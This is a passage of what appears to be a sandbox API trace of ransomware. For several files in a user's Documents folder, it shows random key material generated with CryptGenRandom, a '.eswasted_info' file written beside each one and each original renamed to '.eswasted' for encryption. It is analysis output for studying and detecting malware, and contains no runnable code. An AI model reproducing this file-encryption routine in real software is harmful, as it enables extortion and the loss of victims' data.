returned=".eswasted_info" [0074.891] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.891] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0074.939] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.939] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\u_J_Tv.odp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\u_j_tv.odp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.940] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.941] SetEndOfFile (hFile=0xfc) returned 1 [0074.941] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.941] lstrcpyW (in: lpString1=0x4e1b68, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\u_J_Tv.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\u_j_tv.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\u_J_Tv.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\u_j_tv.odp.eswasted")) returned 1 [0074.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\u_J_Tv.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\u_j_tv.odp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0074.941] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.945] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0074.945] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0074.945] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.946] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0074.946] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0074.946] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.954] SetEndOfFile (hFile=0xfc) returned 1 [0074.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.956] CloseHandle (hObject=0xfc) returned 1 [0074.958] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0074.958] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0074.959] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0074.959] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\oPkx.rtf") returned 67 [0074.959] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4ebff0 [0074.959] lstrcpyW (in: lpString1=0x4ec076, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.959] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.959] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0074.960] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.960] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\oPkx.rtf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\opkx.rtf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.961] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.962] SetEndOfFile (hFile=0xfc) returned 1 [0074.962] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.962] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.962] lstrcpyW (in: lpString1=0x4ec076, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\oPkx.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\opkx.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\oPkx.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\opkx.rtf.eswasted")) returned 1 [0074.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\oPkx.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\opkx.rtf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.963] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0074.964] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0074.965] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0074.965] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.965] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0074.966] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0074.966] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.974] SetEndOfFile (hFile=0xfc) returned 1 [0074.976] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.976] CloseHandle (hObject=0xfc) returned 1 [0074.977] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0074.977] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0074.978] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0074.978] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\qoJ0HvXV.odt") returned 71 [0074.978] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4ebff0 [0074.978] lstrcpyW (in: lpString1=0x4ec07e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.978] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.978] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0074.979] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.979] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\qoJ0HvXV.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\qoj0hvxv.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.979] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.980] SetEndOfFile (hFile=0xfc) returned 1 [0074.980] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.980] lstrcpyW (in: lpString1=0x4ec07e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\qoJ0HvXV.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\qoj0hvxv.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\qoJ0HvXV.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\qoj0hvxv.odt.eswasted")) returned 1 [0074.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\qoJ0HvXV.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\qoj0hvxv.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0074.981] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.982] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0074.983] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0074.983] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.983] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0074.984] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0074.984] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.113] SetEndOfFile (hFile=0xfc) returned 1 [0075.115] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.115] CloseHandle (hObject=0xfc) returned 1 [0075.116] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0075.116] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0075.117] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0075.117] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\RSD-Z8N-3Jayu.odp") returned 76 [0075.117] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e1368 [0075.117] lstrcpyW (in: lpString1=0x4e1400, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.117] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0075.117] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0075.118] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0075.118] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\RSD-Z8N-3Jayu.odp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\rsd-z8n-3jayu.odp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.119] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.120] SetEndOfFile (hFile=0xfc) returned 1 [0075.120] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.120] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.120] lstrcpyW (in: lpString1=0x4e1400, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\RSD-Z8N-3Jayu.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\rsd-z8n-3jayu.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\RSD-Z8N-3Jayu.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\rsd-z8n-3jayu.odp.eswasted")) returned 1 [0075.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\RSD-Z8N-3Jayu.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\rsd-z8n-3jayu.odp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0075.121] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.124] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0075.125] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0075.125] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.125] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0075.125] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0075.125] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.134] SetEndOfFile (hFile=0xfc) returned 1 [0075.136] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.136] CloseHandle (hObject=0xfc) returned 1 [0075.137] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0075.138] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0075.138] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0075.138] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\SQfZ.ods") returned 67 [0075.138] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4ebff0 [0075.139] lstrcpyW (in: lpString1=0x4ec076, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.139] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0075.139] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0075.139] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0075.139] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\SQfZ.ods.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\sqfz.ods.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.240] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.241] SetEndOfFile (hFile=0xfc) returned 1 [0075.241] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.241] lstrcpyW (in: lpString1=0x4ec076, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.241] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\SQfZ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\sqfz.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\SQfZ.ods.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\sqfz.ods.eswasted")) returned 1 [0075.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\SQfZ.ods.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\sqfz.ods.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.242] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0075.244] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0075.245] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.245] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.245] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0075.246] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0075.246] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.254] SetEndOfFile (hFile=0xfc) returned 1 [0075.256] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.257] CloseHandle (hObject=0xfc) returned 1 [0075.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0075.259] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0075.259] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0075.260] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.260] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\WpI7rvYiqW.xls") returned 73 [0075.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29c) returned 0x4ebff0 [0075.260] lstrcpyW (in: lpString1=0x4ec082, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0075.260] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0075.260] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0075.260] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\WpI7rvYiqW.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\wpi7rvyiqw.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.261] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.262] SetEndOfFile (hFile=0xfc) returned 1 [0075.262] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.262] lstrcpyW (in: lpString1=0x4ec082, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\WpI7rvYiqW.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\wpi7rvyiqw.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\WpI7rvYiqW.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\wpi7rvyiqw.xls.eswasted")) returned 1 [0075.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\WpI7rvYiqW.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\wpi7rvyiqw.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 